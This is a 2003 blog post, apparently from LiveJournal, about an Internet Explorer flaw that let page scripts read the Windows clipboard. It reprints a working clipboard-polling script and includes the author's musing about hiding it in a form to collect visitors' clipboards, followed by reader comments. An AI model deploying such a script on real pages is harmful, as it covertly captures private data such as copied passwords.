?

Log in

No account? Create an account
Ramblings Journals I Read Calendar The Dirt MegaZone's Waste of Time Older Older Newer Newer
Another reason not to use IE - MegaZone's Safety Valve
The Ramblings of a Damaged Mind
zonereyrie
zonereyrie
Another reason not to use IE
OK, so I know all browsers have had security flaws - but this one just amazes me because it appears to not be a flaw, but *deliberate*.

VBScript in a webpage view in IE has access to your Windows *Clipboard*. Anything on the clipboard appears to be free game.

http://www.anonymizer.com/snoop/test_clipboard.shtml


<form name=clippie>
<textarea id=MAIN rows=20 cols=50></textarea>

<textarea id=SWAP rows=1 cols=1></textarea>
</form>

<script>

var interval = 4000;
var prevClipboard = "";
var clipHistory = "";

function main ()
{
window.setTimeout("test();", interval);
return;
}

function test()
{

document.clippie.SWAP.value = "";
document.clippie.SWAP.focus();
document.execCommand("paste");
document.clippie.SWAP.blur();
newClipboard = document.clippie.SWAP.value;

document.clippie.SWAP.value = "";
if(newClipboard == prevClipboard)
{
window.setTimeout("test()", interval);
return;
}
clipHistory += "----> " + (new Date()) + ": ";

clipHistory += newClipboard + "";
prevClipboard = newClipboard;

document.clippie.MAIN.value = clipHistory;

window.setTimeout("test();", interval);
return;
}

main();

</script>


I'm tempted to take that code and have it set the value of a hidden form field on some innocent form just to see what people have on the clipboards...

I am: stunned
Current Media: office buzz

4 STDOUT || STDIN
Comments
hyuri From: hyuri Date: September 4th, 2003 01:05 pm (UTC) (Direct Link)
Just one more reason to use Mozilla or Opera whenever possible, I suppose. Completely aside from the whole thing about cross-platform conformity and standards compliance (in Mozilla; I know jack about Opera), of course.
miguelitof From: miguelitof Date: September 4th, 2003 04:44 pm (UTC) (Direct Link)
That's funny, I was just coming here to post that! :D IE is evil, and gets more and more so every day. Everyone should switch to a Mozilla-based browsers and let other people deal with all of these security problems.
From: iwascaite Date: September 4th, 2003 01:12 pm (UTC) (Direct Link)
GaaccK!
Well, I feel better about my no IE policy (I was starting to feel like a paranoid freak.)

Is there a legitimate use for this? What is the good reason for including this "feature"? The evil purposes are quite obvious, but I can't see why anyone would want this.
z_gryphon From: z_gryphon Date: September 4th, 2003 01:33 pm (UTC) (Direct Link)
my favorite IE "feature" is the way it likes to go to Windows Update on startup every so often, even if you've explicitly told it, "start with a blank page." apparently it feels that Windows Update is so important that it deserves to be excepted from the "blank page" rule.
4 STDOUT || STDIN